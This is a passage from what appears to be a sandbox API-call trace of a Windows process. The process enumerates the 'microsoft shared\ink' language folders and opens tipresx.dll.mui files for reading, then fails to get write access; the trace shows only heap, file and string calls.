hHeap=0x20000) returned 1 [0100.591] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.591] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.591] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.591] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.591] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0100.591] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x467b8 [0100.591] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0100.591] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0100.591] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0100.591] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.591] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0100.591] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0100.591] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0100.591] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.591] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0100.591] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.591] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0100.591] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.591] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0100.591] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0100.591] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.591] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c5a8 [0100.591] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0100.591] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.591] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.591] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.591] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c5a8 | out: hHeap=0x20000) returned 1 [0100.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.592] AreFileApisANSI () returned 1 [0100.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0100.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0100.592] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.592] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0100.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0100.592] AreFileApisANSI () returned 1 [0100.592] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0100.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x858a0 [0100.592] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x858a0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\tipresx.dll.mui") returned 73 [0100.592] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-pt\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.593] GetFileType (hFile=0x27c) returned 0x1 [0100.593] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x858a0 | out: hHeap=0x20000) returned 1 [0100.593] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.593] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.593] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.593] CloseHandle (hObject=0x27c) returned 1 [0100.689] AreFileApisANSI () returned 1 [0100.689] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0100.689] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85800 [0100.689] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x85800, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\tipresx.dll.mui") returned 73 [0100.690] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-pt\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.690] GetLastError () returned 0x5 [0100.690] GetLastError () returned 0x5 [0100.690] SetLastError (dwErrCode=0x5) [0100.690] GetLastError () returned 0x5 [0100.690] SetLastError (dwErrCode=0x5) [0100.690] GetLastError () returned 0x5 [0100.690] SetLastError (dwErrCode=0x5) [0100.690] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85800 | out: hHeap=0x20000) returned 1 [0100.690] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0100.690] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.690] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0100.690] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.690] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.690] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x8c5b0, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧⨀")) returned 0 [0100.690] FindClose (in: hFindFile=0x78150 | out: hFindFile=0x78150) returned 1 [0100.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0100.690] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0100.690] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0100.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0100.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0100.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e580 | out: hHeap=0x20000) returned 1 [0100.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0100.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x467b8 | out: hHeap=0x20000) returned 1 [0100.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0100.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0100.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0100.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0100.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0100.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0100.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0100.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0100.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fe78 [0100.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0100.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e4f8 [0100.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fe78 | out: hHeap=0x20000) returned 1 [0100.691] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.691] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.691] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.691] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.691] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0100.691] AreFileApisANSI () returned 1 [0100.691] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO", lpUsedDefaultChar=0x0) returned 57 [0100.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0100.691] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.691] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0100.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0100.691] AreFileApisANSI () returned 1 [0100.692] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0100.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69bb0 [0100.692] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO") returned 57 [0100.692] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ro-ro"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.692] GetLastError () returned 0x5 [0100.692] GetLastError () returned 0x5 [0100.692] SetLastError (dwErrCode=0x5) [0100.692] GetLastError () returned 0x5 [0100.692] SetLastError (dwErrCode=0x5) [0100.692] GetLastError () returned 0x5 [0100.692] SetLastError (dwErrCode=0x5) [0100.692] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0100.692] AreFileApisANSI () returned 1 [0100.692] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0100.692] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a9b0 [0100.692] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6a9b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO") returned 57 [0100.692] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ro-ro"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.692] GetLastError () returned 0x5 [0100.692] GetLastError () returned 0x5 [0100.692] SetLastError (dwErrCode=0x5) [0100.693] GetLastError () returned 0x5 [0100.693] SetLastError (dwErrCode=0x5) [0100.693] GetLastError () returned 0x5 [0100.693] SetLastError (dwErrCode=0x5) [0100.693] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0100.693] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.693] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0100.693] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0100.693] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.693] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.693] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.693] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0100.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5ef58 [0100.693] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0100.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0100.693] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ef58 | out: hHeap=0x20000) returned 1 [0100.693] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e38953f, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e38953f, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e38953f, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2b600, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="rtscom.dll", cAlternateFileName="")) returned 1 [0100.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.693] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.693] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.693] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.693] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0100.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35270 [0100.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0100.693] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e608 [0100.693] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78150 [0100.694] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080e0f5, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0100.694] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3af7a2, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3af7a2, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3af7a2, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0100.694] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e608 | out: hHeap=0x20000) returned 1 [0100.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.694] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.694] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.694] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.694] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e580 [0100.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x467b8 [0100.694] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0100.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0100.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0100.694] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.694] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0100.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0100.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0100.694] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0100.694] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0100.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0100.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0100.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0100.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.695] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c6f8 [0100.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0100.695] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.695] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.695] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.695] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c6f8 | out: hHeap=0x20000) returned 1 [0100.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.695] AreFileApisANSI () returned 1 [0100.695] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0100.695] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0100.695] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.695] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.695] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0100.695] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0100.695] AreFileApisANSI () returned 1 [0100.695] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0100.695] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x853a0 [0100.695] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x853a0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\tipresx.dll.mui") returned 73 [0100.695] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ro-ro\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.696] GetFileType (hFile=0x27c) returned 0x1 